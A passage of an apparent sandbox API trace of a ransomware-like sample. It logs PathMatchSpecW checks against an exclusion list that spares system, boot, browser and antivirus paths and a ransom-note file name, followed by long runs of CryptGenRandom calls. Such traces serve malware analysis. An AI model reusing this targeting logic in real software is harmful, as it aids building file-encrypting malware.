(pszFile="Psychedelic.jpg", pszSpec="*Recovers your files.html") returned 0 [0164.913] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*.exe") returned 0 [0164.913] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*.dll") returned 0 [0164.913] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*.lnk") returned 0 [0164.913] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*.bat") returned 0 [0164.913] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*.ini") returned 0 [0164.913] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*.msi") returned 0 [0164.913] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*.scf") returned 0 [0164.913] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*pagefile.sys*") returned 0 [0164.913] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0164.913] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*AppData*") returned 0 [0164.913] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*\\winrar\\*") returned 0 [0164.913] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0164.913] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*\\java\\*") returned 0 [0164.913] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0164.914] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*\\windows\\*") returned 0 [0164.914] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*\\ESET\\*") returned 0 [0164.914] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*\\AVG\\*") returned 0 [0164.914] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0164.914] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0164.914] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*Atheros*") returned 0 [0164.914] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*Realtek*") returned 0 [0164.914] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*bootmgr*") returned 0 [0164.914] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*boot*") returned 0 [0164.914] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*boot*") returned 0 [0164.914] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0164.914] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*IO.SYS*") returned 0 [0164.914] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0164.914] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*NTDETECT.COM*") returned 0 [0164.914] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*ntldr*") returned 0 [0164.914] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*chrome*") returned 0 [0164.914] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*opera*") returned 0 [0164.914] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*firefox*") returned 0 [0164.914] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Psychedelic.jpg", pszSpec="*") returned 1 [0164.914] strlen (_Str="NMoreira") returned 0x8 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.915] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: 